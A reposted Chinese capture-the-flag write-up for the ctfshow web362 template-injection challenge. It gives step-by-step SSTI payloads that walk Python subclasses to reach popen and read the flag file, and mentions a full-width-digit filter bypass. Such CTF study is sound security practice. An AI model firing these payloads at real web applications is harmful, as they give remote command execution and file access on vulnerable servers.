当前位置:网站首页>ctfshow-web362(SSTI)
ctfshow-web362(SSTI)
2022-04-23 18:29:00 【m0_62094846】

?name={
{"".__class__.__bases__[0].__subclasses__()}}
一直到這一步都是正常的
從12開始就沒用了
數字出現了問題,看wp用全角數字代替正常數字繞過

?name={
{"".__class__.__bases__[0].__subclasses__()[132]}}
然後應該可以用正常方法做了
?name={
{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

版权声明
本文为[m0_62094846]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231829007951.html
边栏推荐
- After CANopen starts PDO timing transmission, the heartbeat frame time is wrong, PDO is delayed, and CANopen time axis is disordered
- C language simulates entering and leaving the stack, first in first out, first in first out, shared memory
- Correct opening method of option
- Realization of consumer gray scale
- QT curve / oscilloscope customplot control
- kettle庖丁解牛第17篇之文本文件输出
- 14 py games source code share the second bullet
- Using transmittablethreadlocal to realize parameter cross thread transmission
- 机器学习实战 -朴素贝叶斯
- If condition judgment in shell language
猜你喜欢

Robocode tutorial 5 - enemy class

Dock installation redis
![Resolve the error Max virtual memory areas VM max_ map_ count [65530] is too low, increase to at least [262144]](/img/5f/a80951777a0473fcaa685cd6a8e5dd.png)
Resolve the error Max virtual memory areas VM max_ map_ count [65530] is too low, increase to at least [262144]

Qt读写XML文件(含源码+注释)

In win10 system, all programs run as administrator by default

Notepad + + replaces tabs with spaces

纠结

【ACM】509. Fibonacci number (DP Trilogy)

硬核解析Promise对象(这七个必会的常用API和七个关键问题你都了解吗?)

Deep learning classic network analysis and target detection (I): r-cnn
随机推荐
Rust: a simple example of TCP server and client
Daily CISSP certification common mistakes (April 14, 2022)
Use bitnami / PostgreSQL repmgr image to quickly set up PostgreSQL ha
Hard core parsing promise object (do you know these seven common APIs and seven key questions?)
Introduction to quantexa CDI syneo platform
Stm32mp157 wm8960 audio driver debugging notes
If condition judgment in shell language
机器学习理论之(8):模型集成 Ensemble Learning
Mysqldump backup database
CISSP certified daily knowledge points (April 15, 2022)
Dock installation redis
由tcl脚本生成板子对应的vivado工程
Spark performance optimization guide
kettle庖丁解牛第17篇之文本文件输出
Gst-launch-1.0 usage notes
MySQL auto start settings start with systemctl start mysqld
Daily CISSP certification common mistakes (April 18, 2022)
Box pointer of rust
Daily network security certification test questions (April 15, 2022)
Function recursion and solving interesting problems